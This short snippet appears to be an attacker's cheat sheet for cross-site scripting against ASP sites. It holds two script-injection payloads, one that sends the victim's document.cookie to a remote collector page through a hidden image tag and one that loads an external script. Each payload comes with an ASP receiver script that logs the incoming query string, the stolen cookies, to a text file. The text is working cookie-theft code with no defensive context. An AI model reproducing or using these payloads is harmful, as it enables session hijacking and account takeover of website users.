|
%3B -> ;
%3D -> =
ASP XSS:
1.<script>document.write('<img src="http://localhost/jk.asp?g='+document.cookie+'" width=0 height=0 />');</script>
<%
msg=Request.ServerVariables("QUERY_STRING")
testfile=Server.MapPath("cook.txt")
set fs=server.CreateObject("scripting.filesystemobject")
set thisfile=fs.OpenTextFile(testfile,8,True,0)
thisfile.Writeline(""&msg& "")
thisfile.close
set fs = nothing %>
2.<script src=http://localhost/1.js></script>
<%
dim fso,file,str
str=unescape(request.Servervariables("QUERY_STRING"))
Const ForReading = 1, ForWriting = 2, ForAppending = 8
Set fso = Server.CreateObject("Scripting.FileSystemObject")
path = server.mappath("xxx.txt")
set file=fso.opentextfile(path, ForAppending, TRUE)
file.write("Xss:")
file.write(str)
file.write vbCrLf
file.close
set file = nothing
set fso = nothing
%> |
|